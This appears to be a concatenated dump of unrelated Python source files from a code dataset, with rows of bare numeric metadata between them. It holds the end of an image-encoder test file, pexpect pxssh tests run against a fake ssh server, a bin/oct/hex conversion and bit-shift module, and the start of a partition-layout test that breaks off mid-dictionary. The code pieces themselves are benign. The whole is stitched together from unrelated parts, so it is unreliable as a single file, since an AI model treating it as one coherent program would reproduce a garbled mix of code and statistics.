    # Group norm with dropout, then no normalization at all.
    for extra in ({"norm": "group", "p_dropout": 0.1}, {"norm": "none"}):
        out = make(in_channels=3, out_channels=32, **extra)(img)
        assert out.shape[:2] == (2, 32)
def test_BottleneckEncoder():
    """Smoke-test the BottleneckEncoder registry entry under several configurations."""
    make = ENCODER_REGISTRY.get("BottleneckEncoder")

    # Default configuration.
    out = make(in_channels=3, out_channels=32)(img)
    assert out.shape[:2] == (2, 32)

    # Custom layer config returning intermediate feature maps.
    out = make(
        in_channels=3,
        out_channels=32,
        layer_config=(32, 64, 96),
        intermediate_features=True,
    )(img)
    assert isinstance(out, list) and len(out) == 4

    # Group norm + dropout, instance norm, and no normalization.
    for extra in (
        {"norm": "group", "p_dropout": 0.1},
        {"norm": "instance"},
        {"norm": "none"},
    ):
        out = make(in_channels=3, out_channels=32, **extra)(img)
        assert out.shape[:2] == (2, 32)
def test_GANetBackbone():
    """GANetBackbone's second output should carry the requested channel count."""
    backbone = ENCODER_REGISTRY.get("GANetBackbone")(in_channels=3, out_channels=32)
    second = backbone(img)[1]
    assert second.shape[:2] == (2, 32)
def test_PyramidEncoder():
    """PyramidEncoder should emit one feature map per configured level."""
    encoder = ENCODER_REGISTRY.get("PyramidEncoder")(in_channels=3, config=(16, 32, 64))
    pyramid = encoder(img)
    assert isinstance(pyramid, (list, tuple))
    assert len(pyramid) == 3
def test_PSPNetBackbone():
    """PSPNetBackbone should return 5 feature maps, with or without norm."""
    make = ENCODER_REGISTRY.get("PSPNetBackbone")
    for kwargs in ({}, {"norm": False}):
        pyramid = make(**kwargs)(img)
        assert isinstance(pyramid, (list, tuple))
        assert len(pyramid) == 5  # PSPNetBackbone returns 5 feature maps
def test_BasicConvEncoder():
    """Each configured stage of BasicConvEncoder should emit its channel count."""
    encoder = ENCODER_REGISTRY.get("BasicConvEncoder")(
        in_channels=3, config=(16, 32, 64)
    )
    outs = encoder(img)
    assert len(outs) == 3, "Number of outputs do not match"
    for out, channels in zip(outs, (16, 32, 64)):
        assert out.shape[:2] == (2, channels), "Number of output channels do not match"
def test_FlownetConvEncoder():
    """Smoke-test FlowNetConvEncoder with two layer configurations.

    Both configs are expected to yield 3 outputs with channels (16, 32, 64)
    — including the 4-entry config, per the original assertions.
    """
    make = ENCODER_REGISTRY.get("FlowNetConvEncoder")
    for config in ((16, 32, 64), (16, 32, 64, 64)):
        outs = make(in_channels=3, config=config)(img)
        assert len(outs) == 3, "Number of outputs do not match"
        for out, channels in zip(outs, (16, 32, 64)):
            assert out.shape[:2] == (2, channels), "Number of output channels do not match"
| 30.56338
| 88
| 0.678802
| 589
| 4,340
| 4.872666
| 0.110357
| 0.07108
| 0.041463
| 0.080488
| 0.852265
| 0.810453
| 0.78885
| 0.780836
| 0.780836
| 0.766899
| 0
| 0.04934
| 0.196774
| 4,340
| 141
| 89
| 30.780142
| 0.773953
| 0.017281
| 0
| 0.702128
| 0
| 0
| 0.131863
| 0
| 0
| 0
| 0
| 0
| 0.297872
| 1
| 0.074468
| false
| 0
| 0.021277
| 0
| 0.095745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d49b23cb1010ecaa2b8700afe5653b81a5f1046
| 11,046
|
py
|
Python
|
tests/test_pxssh.py
|
ahuigo/pexpect
|
f683ca37dec3a19bb9077dba89b4057f3ff16fac
|
[
"0BSD"
] | null | null | null |
tests/test_pxssh.py
|
ahuigo/pexpect
|
f683ca37dec3a19bb9077dba89b4057f3ff16fac
|
[
"0BSD"
] | null | null | null |
tests/test_pxssh.py
|
ahuigo/pexpect
|
f683ca37dec3a19bb9077dba89b4057f3ff16fac
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
import os
import tempfile
import unittest
from pexpect import pxssh
class SSHTestBase(unittest.TestCase):
    """Prepend the bundled ``fakessh`` directory to PATH for each test.

    This makes ``ssh`` resolve to the fake server shipped with the test
    suite; the original PATH is restored (or removed) in tearDown().
    """

    def setUp(self):
        self.orig_path = os.environ.get('PATH')
        fakessh_dir = os.path.abspath(
            os.path.join(os.path.dirname(__file__), 'fakessh'))
        if self.orig_path:
            os.environ['PATH'] = fakessh_dir + os.pathsep + self.orig_path
        else:
            os.environ['PATH'] = fakessh_dir

    def tearDown(self):
        if self.orig_path:
            os.environ['PATH'] = self.orig_path
        else:
            del os.environ['PATH']
class PxsshTestCase(SSHTestBase):
    """Tests for ``pexpect.pxssh`` against the fake ssh server on PATH.

    Tests constructed with ``pxssh.pxssh(debug_command_string=True)`` never
    spawn a process: ``login()`` then returns the ssh command line it would
    have executed, which the tests inspect directly.

    FIX: ``test_custom_ssh_cmd_debug`` was defined twice with identical
    bodies; the second definition silently shadowed the first, so one copy
    was dead code. The duplicate has been removed.
    """

    def test_fake_ssh(self):
        # Full round trip against the fake server: login, ping/pong, logout.
        ssh = pxssh.pxssh()
        #ssh.logfile_read = sys.stdout # DEBUG
        ssh.login('server', 'me', password='s3cret')
        ssh.sendline('ping')
        ssh.expect('pong', timeout=10)
        assert ssh.prompt(timeout=10)
        ssh.logout()

    def test_wrong_pw(self):
        # A bad password must raise ExceptionPxssh, not log in.
        ssh = pxssh.pxssh()
        try:
            ssh.login('server', 'me', password='wr0ng')
        except pxssh.ExceptionPxssh:
            pass
        else:
            assert False, 'Password should have been refused'

    def test_failed_set_unique_prompt(self):
        # If the prompt cannot be reset, login() must raise.
        ssh = pxssh.pxssh()
        ssh.set_unique_prompt = lambda: False
        try:
            ssh.login('server', 'me', password='s3cret',
                      auto_prompt_reset=True)
        except pxssh.ExceptionPxssh:
            pass
        else:
            assert False, 'should have raised exception, pxssh.ExceptionPxssh'

    def test_connection_refused(self):
        # An unknown host must raise ExceptionPxssh.
        ssh = pxssh.pxssh()
        try:
            ssh.login('noserver', 'me', password='s3cret')
        except pxssh.ExceptionPxssh:
            pass
        else:
            assert False, 'should have raised exception, pxssh.ExceptionPxssh'

    def test_ssh_tunnel_string(self):
        # Local/remote/dynamic tunnels must all appear in the command string.
        ssh = pxssh.pxssh(debug_command_string=True)
        tunnels = { 'local': ['2424:localhost:22'],'remote': ['2525:localhost:22'],
                    'dynamic': [8888] }
        confirmation_strings = 0
        confirmation_array = ['-R 2525:localhost:22','-L 2424:localhost:22','-D 8888']
        string = ssh.login('server', 'me', password='s3cret', ssh_tunnels=tunnels)
        for confirmation in confirmation_array:
            if confirmation in string:
                confirmation_strings+=1
        if confirmation_strings!=len(confirmation_array):
            assert False, 'String generated from tunneling is incorrect.'

    def test_remote_ssh_tunnel_string(self):
        # Same tunnel flags must also be emitted when spawning on a remote host.
        ssh = pxssh.pxssh(debug_command_string=True)
        tunnels = { 'local': ['2424:localhost:22'],'remote': ['2525:localhost:22'],
                    'dynamic': [8888] }
        confirmation_strings = 0
        confirmation_array = ['-R 2525:localhost:22','-L 2424:localhost:22','-D 8888']
        string = ssh.login('server', 'me', password='s3cret', ssh_tunnels=tunnels, spawn_local_ssh=False)
        for confirmation in confirmation_array:
            if confirmation in string:
                confirmation_strings+=1
        if confirmation_strings!=len(confirmation_array):
            assert False, 'String generated from remote tunneling is incorrect.'

    def test_ssh_config_passing_string(self):
        # ssh_config must be forwarded via the -F flag.
        ssh = pxssh.pxssh(debug_command_string=True)
        temp_file = tempfile.NamedTemporaryFile()
        config_path = temp_file.name
        string = ssh.login('server', 'me', password='s3cret', spawn_local_ssh=False, ssh_config=config_path)
        if not '-F '+config_path in string:
            assert False, 'String generated from SSH config passing is incorrect.'

    def test_username_or_ssh_config(self):
        # login() without a username and without an ssh_config must fail.
        try:
            ssh = pxssh.pxssh(debug_command_string=True)
            temp_file = tempfile.NamedTemporaryFile()
            config_path = temp_file.name
            string = ssh.login('server')
            raise AssertionError('Should have failed due to missing username and missing ssh_config.')
        except TypeError:
            pass

    def test_ssh_config_user(self):
        # The username may come from a (case-insensitive) Host/User config pair.
        ssh = pxssh.pxssh(debug_command_string=True)
        temp_file = tempfile.NamedTemporaryFile()
        config_path = temp_file.name
        temp_file.write(b'HosT server\n'
                        b'UsEr me\n'
                        b'hOSt not-server\n')
        temp_file.seek(0)
        string = ssh.login('server', ssh_config=config_path)

    def test_ssh_config_no_username_empty_config(self):
        # An empty config cannot supply the missing username.
        ssh = pxssh.pxssh(debug_command_string=True)
        temp_file = tempfile.NamedTemporaryFile()
        config_path = temp_file.name
        try:
            string = ssh.login('server', ssh_config=config_path)
            raise AssertionError('Should have failed due to no Host.')
        except TypeError:
            pass

    def test_ssh_config_wrong_Host(self):
        # A config with only non-matching Host entries cannot supply a user.
        ssh = pxssh.pxssh(debug_command_string=True)
        temp_file = tempfile.NamedTemporaryFile()
        config_path = temp_file.name
        temp_file.write(b'Host not-server\n'
                        b'Host also-not-server\n')
        temp_file.seek(0)
        try:
            string = ssh.login('server', ssh_config=config_path)
            raise AssertionError('Should have failed due to no matching Host.')
        except TypeError:
            pass

    def test_ssh_config_no_user(self):
        # A matching Host with no User line cannot supply a username.
        ssh = pxssh.pxssh(debug_command_string=True)
        temp_file = tempfile.NamedTemporaryFile()
        config_path = temp_file.name
        temp_file.write(b'Host server\n'
                        b'Host not-server\n')
        temp_file.seek(0)
        try:
            string = ssh.login('server', ssh_config=config_path)
            raise AssertionError('Should have failed due to no user.')
        except TypeError:
            pass

    def test_ssh_config_empty_user(self):
        # A matching Host with an empty User value cannot supply a username.
        ssh = pxssh.pxssh(debug_command_string=True)
        temp_file = tempfile.NamedTemporaryFile()
        config_path = temp_file.name
        temp_file.write(b'Host server\n'
                        b'user \n'
                        b'Host not-server\n')
        temp_file.seek(0)
        try:
            string = ssh.login('server', ssh_config=config_path)
            raise AssertionError('Should have failed due to empty user.')
        except TypeError:
            pass

    def test_ssh_key_string(self):
        # ssh_key=True forwards the agent (-A); a key path adds -i <path>.
        ssh = pxssh.pxssh(debug_command_string=True)
        confirmation_strings = 0
        confirmation_array = [' -A']
        string = ssh.login('server', 'me', password='s3cret', ssh_key=True)
        for confirmation in confirmation_array:
            if confirmation in string:
                confirmation_strings+=1
        if confirmation_strings!=len(confirmation_array):
            assert False, 'String generated from forcing the SSH agent sock is incorrect.'
        confirmation_strings = 0
        temp_file = tempfile.NamedTemporaryFile()
        ssh_key = temp_file.name
        confirmation_array = [' -i '+ssh_key]
        string = ssh.login('server', 'me', password='s3cret', ssh_key=ssh_key)
        for confirmation in confirmation_array:
            if confirmation in string:
                confirmation_strings+=1
        if confirmation_strings!=len(confirmation_array):
            assert False, 'String generated from adding an SSH key is incorrect.'

    def test_custom_ssh_cmd_debug(self):
        # A custom cmd= string must be reflected verbatim in the debug output.
        # NOTE: this method was previously defined twice with identical bodies;
        # the duplicate definition has been removed.
        ssh = pxssh.pxssh(debug_command_string=True)
        cipher_string = '-c aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,' \
                        + 'aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,' \
                        + 'aes256-cbc,arcfour'
        confirmation_strings = 0
        confirmation_array = [cipher_string, '-2']
        string = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
        for confirmation in confirmation_array:
            if confirmation in string:
                confirmation_strings+=1
        if confirmation_strings!=len(confirmation_array):
            assert False, 'String generated for custom ssh client command is incorrect.'

    def test_failed_custom_ssh_cmd_debug(self):
        # Even an invalid cipher string is passed through in debug mode.
        ssh = pxssh.pxssh(debug_command_string=True)
        cipher_string = '-c invalid_cipher'
        confirmation_strings = 0
        confirmation_array = [cipher_string, '-2']
        string = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
        for confirmation in confirmation_array:
            if confirmation in string:
                confirmation_strings+=1
        if confirmation_strings!=len(confirmation_array):
            assert False, 'String generated for custom ssh client command is incorrect.'

    def test_custom_ssh_cmd(self):
        # A valid custom cmd should log into the mock client and exit cleanly.
        try:
            ssh = pxssh.pxssh()
            cipher_string = '-c aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,' \
                            + 'aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,' \
                            + 'aes256-cbc,arcfour'
            result = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
            ssh.PROMPT = r'Closed connection'
            ssh.sendline('exit')
            ssh.prompt(timeout=5)
            string = str(ssh.before) + str(ssh.after)
            if 'Closed connection' not in string:
                assert False, 'should have logged into Mock SSH client and exited'
        except pxssh.ExceptionPxssh:
            assert False, 'should not have raised exception, pxssh.ExceptionPxssh'
        else:
            pass

    def test_failed_custom_ssh_cmd(self):
        # An invalid cipher should make the real login attempt fail.
        try:
            ssh = pxssh.pxssh()
            cipher_string = '-c invalid_cipher'
            result = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
            ssh.PROMPT = r'Closed connection'
            ssh.sendline('exit')
            ssh.prompt(timeout=5)
            string = str(ssh.before) + str(ssh.after)
            if 'Closed connection' not in string:
                assert False, 'should not have completed logging into Mock SSH client and exited'
        except pxssh.ExceptionPxssh:
            pass
        else:
            assert False, 'should have raised exception, pxssh.ExceptionPxssh'
# Allow running this test module directly: `python test_pxssh.py`.
if __name__ == '__main__':
    unittest.main()
| 40.461538
| 108
| 0.616965
| 1,287
| 11,046
| 5.114996
| 0.135975
| 0.029166
| 0.037521
| 0.041319
| 0.839435
| 0.789154
| 0.778824
| 0.73386
| 0.716087
| 0.69558
| 0
| 0.024455
| 0.281821
| 11,046
| 272
| 109
| 40.610294
| 0.80537
| 0.00516
| 0
| 0.685106
| 0
| 0
| 0.198981
| 0.030311
| 0
| 0
| 0
| 0
| 0.089362
| 1
| 0.089362
| false
| 0.114894
| 0.017021
| 0
| 0.114894
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b4f92b2a99145b826f09b40c5307a72b12e109cf
| 8,155
|
py
|
Python
|
module_bit.py
|
pgming-life/practical_package
|
6a68c4ef9361fc52d8dabbb9cfe04f84914fd015
|
[
"MIT"
] | null | null | null |
module_bit.py
|
pgming-life/practical_package
|
6a68c4ef9361fc52d8dabbb9cfe04f84914fd015
|
[
"MIT"
] | null | null | null |
module_bit.py
|
pgming-life/practical_package
|
6a68c4ef9361fc52d8dabbb9cfe04f84914fd015
|
[
"MIT"
] | null | null | null |
"""module_bit.py"""
"""
Bin, Oct, Dec, Hex mutual conversion
details:
・base: radix number (other than Decimal: 0b, 0o, 0x)
・radix: 2 | 8 | 10 | 16 (int)
・operand: conversion destination (int)
・is_print=True: result print
※Return int
ex) number_conv(base=0b10100, radix=2, operand=16) = 0x14 (return 20(int))
"""
def number_conv(base, radix=16, operand=2, is_print=False):
    """Convert *base* between binary, octal, decimal and hexadecimal.

    Table-driven replacement for the original 4x4 branch lattice; behavior
    (returned values, printed traces, None on invalid input) is unchanged.

    Args:
        base: The number to convert, written as an int literal in the input
              radix (e.g. 0b10100 / 0o24 / 20 / 0x14).
        radix: Radix the input is written in: 2 | 8 | 10 | 16.
        operand: Radix to convert to: 2 | 8 | 10 | 16 (must differ from radix;
                 the original code treated operand == radix as invalid).
        is_print: When True, print a "src→dst: value" trace (or an error).

    Returns:
        The converted value as an int, or None when radix/operand is invalid.

    ex) number_conv(base=0b10100, radix=2, operand=16) = 0x14 (return 20(int))
    """
    names = {2: "bin", 8: "oct", 10: "dec", 16: "hex"}
    converters = {2: bin, 8: oct, 16: hex}
    if radix not in names:
        if is_print:
            print("The radix is incorrect.\nPlease try again.")
        return None
    # operand == radix was rejected by the original code (fell through to
    # the "operand is incorrect" branch), so keep rejecting it.
    if operand not in names or operand == radix:
        if is_print:
            print("The operand is incorrect.\nPlease try again.")
        return None
    if operand == 10:
        # Decimal target: the int itself already is the decimal value.
        if is_print:
            print("{}→dec: {}".format(names[radix], base))
        return base
    num = converters[operand](base)
    if is_print:
        print("{}→{}: {}".format(names[radix], names[operand], num))
    # int(x, 0) parses the "0b"/"0o"/"0x" prefix produced by bin/oct/hex.
    return int(num, 0)
"""
Bit Shift
details:
・base: radix number (other than Decimal: 0b, 0o, 0x)
・shift: int
・radix: 2 | 8 | 10 | 16 (int)
・lr: left | right (str)
・is_print=True: result print
※Return int
ex) bit_shift(base=0b10100, shift=3) = 0b10 (return 2(int))
"""
def bit_shift(base, shift, radix=2, lr="right", is_print=False):
    """Shift *base* left or right by *shift* bits.

    Table-driven replacement for four identical radix branches that differed
    only in the printed label; behavior (returned values, printed traces,
    None on invalid input) is unchanged. Note the radix only affects the
    trace label — the shift itself is the same for every radix.

    Args:
        base: The number to shift (an int literal, e.g. 0b10100 / 0x14).
        shift: Number of bit positions to shift by (int).
        radix: Radix label for the trace: 2 | 8 | 10 | 16.
        lr: "left" or "right" shift direction.
        is_print: When True, print the shift base and result in binary.

    Returns:
        The shifted value as an int, or None when radix/lr is invalid.

    ex) bit_shift(base=0b10100, shift=3) = 0b10 (return 2(int))
    """
    names = {2: "bin", 8: "oct", 10: "dec", 16: "hex"}
    if radix not in names:
        if is_print:
            print("The radix is incorrect.\nPlease try again.")
        return None
    if lr == "left":
        shifted = bin(base << shift)
    elif lr == "right":
        shifted = bin(base >> shift)
    else:
        if is_print:
            print("There is no specification of left shift or right shift.\nPlease try again.")
        return None
    if is_print:
        name = names[radix]
        print("shift base ({}): {}".format(name, bin(base)))
        print("{} {} shift (result): {}".format(name, lr, shifted))
    return int(shifted, 0)
"""
Bit Mask
details:
・base: int (other than Decimal: 0b, 0o, 0x)
・mask: bit mask ANDed with base (int)
・operand: radix used for the printed result: 2 | 16 (int)
・is_print=True: result print
※Return int
ex) bit_mask(base=0x01000001, mask=0x000000FF) = 0x1 (return 1(int))
bit_mask(base=bit_shift(0x01000001, 24, 16), mask=0x000000FF) = 0x1 (return 1(int))
"""
def bit_mask(base, mask, operand=16, is_print=False):
    """AND *base* with *mask* and return the masked value.

    Table-driven replacement for the duplicated binary/hex branches;
    behavior (returned values, printed traces, None on invalid input)
    is unchanged.

    Args:
        base: The number to mask (an int literal, e.g. 0x01000001).
        mask: The bit mask ANDed with base (int).
        operand: Radix used for the printed trace: 2 (binary) or 16 (hex).
        is_print: When True, print base, mask and result in that radix.

    Returns:
        base & mask as an int, or None when operand is not 2 or 16.

    ex) bit_mask(base=0x01000001, mask=0x000000FF) = 0x1 (return 1(int))
    """
    formats = {2: ("bin", bin), 16: ("hex", hex)}
    if operand not in formats:
        if is_print:
            print("There is no mask specified for binary or hexadecimal.\nPlease try again.")
        return None
    name, fmt = formats[operand]
    masked = fmt(base & mask)
    if is_print:
        print("base ({}): {}".format(name, fmt(base)))
        print("mask ({}): {}".format(name, fmt(mask)))
        print("{} mask (result): {}".format(name, masked))
    return int(masked, 0)
"""
Tests
"""
if __name__ == "__main__":
    # Manual smoke tests: each call prints its own trace (is_print=True),
    # and the outer print() shows the returned int value.
    #from module_bit import *
    # mutual conversion: 0b10100 (bin) -> hex; expect trace 0x14, return 20
    print("●Bin, Oct, Dec, Hex mutual conversion")
    print(number_conv(0b10100, 2, 16, is_print=True))
    print()
    # bit shift: 0b10100 >> 3; expect trace 0b10, return 2
    print("●bit shift")
    print(bit_shift(0b10100, 3, 2, "right", is_print=True))
    print()
    # bit mask: 0x01000001 & 0x000000FF; expect trace 0x1, return 1
    print("●bit mask")
    print(bit_mask(0x01000001, 0x000000FF, 16, is_print=True))
    print()
    # combined: shift 0x01000001 right by 24 bits, then mask with 0xFF
    print("●shift & mask")
    print(bit_mask(bit_shift(0x01000001, 24, 16, "right", is_print=True), 0x000000FF, 16, is_print=True))
    print()
| 34.555085
| 105
| 0.475782
| 976
| 8,155
| 3.938525
| 0.086066
| 0.080125
| 0.077263
| 0.120187
| 0.823361
| 0.792144
| 0.735952
| 0.707336
| 0.675338
| 0.634755
| 0
| 0.050318
| 0.383446
| 8,155
| 236
| 106
| 34.555085
| 0.708035
| 0.011036
| 0
| 0.764706
| 0
| 0
| 0.214487
| 0
| 0
| 0
| 0.005637
| 0
| 0
| 1
| 0.016043
| false
| 0
| 0
| 0
| 0.13369
| 0.497326
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b4f9c454a92c0fd48a129b823809714dc43cc229
| 129,887
|
py
|
Python
|
ovs/lib/tests/test_partition_layout.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | 1
|
2019-10-30T20:50:59.000Z
|
2019-10-30T20:50:59.000Z
|
ovs/lib/tests/test_partition_layout.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
ovs/lib/tests/test_partition_layout.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Flexible partition layout test module
- verify if detected disk configuration is correct
- verify if generated default layout is correct / useable without changes
Example detected disk configuration:
disk_config =
{'sda': {'boot_device': True, 'model': 'Virtual_disk', 'size': 17179869184.0, 'software_raid': False, 'type': 'disk'},
'sdb': {'boot_device': False, 'model': 'Virtual_disk', 'size': 109279444992.0, 'software_raid': False, 'type': 'disk'},
'sdc': {'boot_device': False, 'model': 'Virtual_disk', 'size': 109279444992.0, 'software_raid': False, 'type': 'disk'}}
Disks that should be excluded:
- boot device
- disk with 1 or more partitions being part of a software raid
"""
import unittest
from ovs.lib.setup import SetupController
from ovs.extensions.generic.sshclient import SSHClient
from datadiff import diff
from datadiff.tools import assert_equal
import sys
import pexpect
class PartitionLayout(unittest.TestCase):
full_map = {
'12-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'1-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'1-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
